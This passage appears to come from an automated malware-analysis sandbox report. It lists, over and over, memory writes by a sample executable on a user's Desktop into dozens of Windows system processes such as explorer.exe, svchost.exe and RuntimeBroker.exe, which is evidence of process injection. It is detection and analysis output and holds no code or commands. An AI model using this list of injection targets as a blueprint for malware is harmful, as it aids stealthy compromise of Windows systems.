        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 120000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 590000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 190000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 330000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 710000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 600000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3110000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 130000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 340000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 720000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 380000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 610000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3230000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 140000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 350000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 730000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 390000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 620000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3250000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 150000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 410000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 740000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 630000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 880000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 960000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 33C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 160000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 420000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 750000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 640000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 890000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 970000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 33F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 170000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 430000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 960000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 380000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 760000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 650000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 8A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 960000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 980000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3400000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 180000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 440000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 970000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 390000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 770000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 660000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 8B0000Jump to behavior
